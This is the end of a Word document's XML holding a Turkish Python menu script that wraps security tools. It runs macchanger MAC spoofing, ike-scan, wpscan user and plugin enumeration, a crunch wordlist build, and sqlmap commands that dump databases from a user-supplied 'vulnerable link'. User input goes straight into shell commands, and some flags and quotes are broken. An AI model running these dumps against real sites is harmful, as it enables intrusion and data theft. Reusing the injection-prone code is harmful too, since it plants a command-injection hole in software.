    </w:p>
    <w:p w14:paraId="79B052C0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(islemno=="23"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6382D6" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>macadres = raw_input("Yeni MAC Adresi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F4BF3" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 down")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3154A9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("macchanger --mac " + macadres + " eth0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189B7C0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 up")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B3137" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("\033[92mYeni MAC Adresi Elle Belirlendi.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747BFD78" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7D369" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="24"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3655DC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 down")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588B649" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("macchanger -p eth0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5CE6F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 up")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178D4FD8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("\033[92mYeni MAC Orijinale Donduruldu.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233CCAF1" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="25"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E423F3D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("lynis audit system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80F022" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="338934A0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="26"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4A3BC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>hedefip = raw_input("Hedef Ip Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA3351" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ike-scan " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FAA55" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="388634C1" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="0FA29A98" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="6C1181D2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="27"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE55DD" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>site = raw_input("Site Adresi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920F3CD" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("wpscan --url " + site)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035C456" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="49B9C7F2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="28"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77386B4C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>site = raw_input("Site Adresi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A794163" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("wpscan --url " + site + " --enumerate p" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE59B1" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="0F53B644" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="29"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198415D0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>site = raw_input("Site Adresi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B458E7F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("wpscan --url " + site + " --enumerate t" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36789858" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="4B794BB3" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="30"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759E2CE" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>site = raw_input("Site Adresi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EA4F9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("wpscan --url " + site + " --enumerate u" )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEB9769" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="7C1C5E66" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="675E654A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="31"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60BA00" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>acikliLink = raw_input("Acikli Link Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CC5DFA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("sqlmap -u " + acikliLink + " --dbs --random-agent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E20B5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51796DE9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="32"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A594A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>acikliLink = raw_input("Acikli Link Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C036F7" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>veritabani = raw_input("veritabani Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309555C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " --tables --random-agent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C63AC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="34287F46" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="33"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A76657" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>acikliLink = raw_input("Acikli Link Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010DDD25" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>veritabani = raw_input("veritabani Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE97723" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tablo = raw_input("Tablo Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C3104" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " - " + tablo + " --columns --random-agent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B412762" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="2D9089EC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="34"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07DE1E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>acikliLink = raw_input("Acikli Link Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0E9A5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>veritabani = raw_input("veritabani Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C703EBD" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tablo = raw_input("Tablo Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923A816" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>colon = raw_input("Colon Adini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F41C26" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " - " + tablo + " -C" + colon + " --dump --random-agent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8B492" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="2C642BEB" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="35):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F598E9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="7DF7E182" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>minimum = raw_input("Minimum Karakter Sayisi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29932147" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>maximum = raw_input("Maximum Karakter Sayisi Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C706DBF" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>karekter = raw_input("Istediginiz Karakter Sayisi: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F00C4" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="363D4AE0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("crunch " + minimum + " " + maximum + " " + karekter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E4DE3" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("Basari ile Tamamlandi..")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAEE77C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="52F38113" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB877F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                print("Hatali Secim.!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A0BEB" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                os.system("python Tarama_Kutuphanem.py")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A282F16" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A30402" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DD903B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>istek = raw_input("Yeni Arama Yapmak Ister Misiniz ? (y/n): ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2D033" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="6629E0CF" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(istek=="y"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA26371" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("python Tarama_Kutuphanem.py ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDD971" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="4B1B9366" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(istek=="n"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2979A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("Gorusuruz..")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEF033" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="664194BD" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5449CC" w14:textId="7CF40A0C" w:rsidR="000D3882" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("yes var no var ?!!")</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000D3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75"/>
    <w:rsid w:val="000D3882"/>
    <w:rsid w:val="009F5775"/>
    <w:rsid w:val="00EB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B5F70-DB8A-41E2-8131-241846F8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samaraz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>furkan samaraz</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T14:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-26T14:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>